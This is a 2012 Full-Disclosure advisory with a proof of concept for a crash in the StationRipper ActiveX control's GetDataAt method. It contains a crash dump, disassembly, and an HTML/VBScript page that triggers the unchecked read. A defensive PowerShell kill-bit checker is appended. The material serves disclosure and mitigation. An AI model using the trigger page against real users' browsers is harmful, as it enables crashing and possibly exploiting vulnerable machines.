Message-ID: <CADe7mMdKbYmf8c==6oz5w9XE3+78wbCBa0yQWvoC4HNjX=ggtg@mail.gmail.com>
Date: Thu, 19 Jul 2012 11:22:57 -0700
From: kaveh ghaemmaghami <kavehghaemmaghami@...glemail.com>
To: full-disclosure@...ts.grok.org.uk
Subject: stationripper ActiveX (RSLSPCOM.dll) BoF PoC

Exploit Title: stationripper ActiveX (RSLSPCOM.dll) BoF PoC
Date: July 19, 2012
Author: coolkaveh
coolkaveh@...ketmail.com
Https://twitter.com/coolkaveh
Vendor Homepage: www.stationripper.com
Version: 2.98.3/1
Tested on: Windows XP SP3

---------------------------------------------------------------------------------------
cheers to awesome hippie flaw hunter
---------------------------------------------------------------------------------------
Class: SSLDataContainer
GUID: {E52990C2-7CED-4756-9B3B-6188A5B41704}
Method: GetDataAt
Function GetDataAt (
    ByVal lPos As Long,
    ByVal lHowMuch As Long
) As String

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
EIP 003B1191
EAX 00000000
EBX 003BB3BC -> 003B3904
ECX 003D2120 -> BAADF00D
EDX 00000000
EDI FFFFFFFF
ESI 00000000
EBP 0013EDA4 -> 0013EDCC
ESP 0013ED64 -> 003BB3BC


Block Disassembly:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
3B1181	MOV DL,AL
3B1183	AND DL,F
3B1186	SHL DL,2
3B1189	OR [EBP+13],DL
3B118C	SHR AL,4
3B118F	MOV DL,AL
3B1191	MOV AL,[EDI]	  <--- CRASH
3B1193	MOV BL,AL
3B1195	AND BL,3
3B1198	SHL BL,4
3B119B	OR DL,BL
3B119D	SHR AL,2
3B11A0	MOV [EBP+F],AL
3B11A3	MOV EAX,[EBP-4]
3B11A6	SUB [EBP-8],EAX


ArgDump:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
EBP+8	003D2120 -> BAADF00D
EBP+12	FFFFFFFF          (matches arg1 = -1, lPos)
EBP+16	00000001          (matches arg2 = 1, lHowMuch)
EBP+20	00000005
EBP+24	00000001
EBP+28	00000000

Note: the faulting instruction is a read of [EDI] with EDI = FFFFFFFF, the same
value passed as lPos. What the crash demonstrates is an unchecked read at a
caller-chosen offset; any write primitive would have to be established separately.

<html>
<body>
Exploit
<object classid='clsid:E52990C2-7CED-4756-9B3B-6188A5B41704' id='xpl'></object>
<script language='vbscript'>
' COMRaider-style metadata, kept for reference; not used by the trigger itself
targetFile = "C:\Program Files\Ratajik Software\StationRipper\RSLSPCOM.dll"
prototype  = "Function GetDataAt ( ByVal lPos As Long , ByVal lHowMuch As Long ) As String"
memberName = "GetDataAt"
progid     = "SSLHIJACKCLIENTCOMLib.SSLDataContainer"
argCount   = 2

' Trigger: a negative position with a one-byte length
arg1 = -1   ' lPos
arg2 = 1    ' lHowMuch

xpl.GetDataAt arg1, arg2
</script>
</body>
</html>

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
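Added example (not from the advisory above and not StationRipper's own code): a PowerShell script that checks whether the SSLDataContainer CLSID from this post is registered on a machine and whether Internet Explorer's kill bit is set for it, and optionally sets the kill bit. The registry locations are the standard IE ActiveX Compatibility keys and 0x400 is the documented kill-bit flag; the script name, the -SetKillBit switch and the Get-KillBitState helper are this example's own choices.

```powershell
# Check-StationRipperKillBit.ps1 (example script, not part of the original post)
# Usage:  .\Check-StationRipperKillBit.ps1            # report only
#         .\Check-StationRipperKillBit.ps1 -SetKillBit # set the kill bit (run elevated)
param(
    [string]$Clsid = '{E52990C2-7CED-4756-9B3B-6188A5B41704}',  # CLSID from the advisory
    [switch]$SetKillBit
)

$KillBit = 0x400   # COMPAT_EVIL_DONT_LOAD: IE refuses to instantiate the control

$clsidKey  = "Registry::HKEY_CLASSES_ROOT\CLSID\$Clsid"
$compatKey = "HKLM:\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\$Clsid"

function Get-KillBitState {
    param([string]$Path)
    if (-not (Test-Path $Path)) { return 'not set (no compatibility key)' }
    $flags = (Get-ItemProperty -Path $Path -Name 'Compatibility Flags' `
              -ErrorAction SilentlyContinue).'Compatibility Flags'
    if ($null -eq $flags) { return 'not set (no Compatibility Flags value)' }
    if ($flags -band $KillBit) { return ('set (0x{0:X8})' -f $flags) }
    return ('not set (0x{0:X8})' -f $flags)
}

# 1. Is the control registered at all? If not, the PoC cannot instantiate it.
if (Test-Path $clsidKey) {
    $server = (Get-ItemProperty -Path "$clsidKey\InprocServer32" `
               -ErrorAction SilentlyContinue).'(default)'
    Write-Host "CLSID $Clsid is registered; InprocServer32 = $server"
} else {
    Write-Host "CLSID $Clsid is not registered on this machine"
}

# 2. Report the kill-bit state.
Write-Host "Kill bit: $(Get-KillBitState -Path $compatKey)"

# 3. Optionally set it, preserving any other compatibility flags already present.
if ($SetKillBit) {
    if (-not (Test-Path $compatKey)) { New-Item -Path $compatKey -Force | Out-Null }
    $existing = (Get-ItemProperty -Path $compatKey -Name 'Compatibility Flags' `
                 -ErrorAction SilentlyContinue).'Compatibility Flags'
    $new = ([int]$existing) -bor $KillBit
    Set-ItemProperty -Path $compatKey -Name 'Compatibility Flags' -Value $new -Type DWord
    Write-Host "Kill bit now: $(Get-KillBitState -Path $compatKey)"
}
```

On 64-bit Windows, 32-bit Internet Explorer reads the kill bit from the Wow6432Node copy of the ActiveX Compatibility key, so run the check against that path as well; setting the kill bit blocks only instantiation from IE and other hosts that honour it, it does not remove the DLL or fix the unchecked read in GetDataAt.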
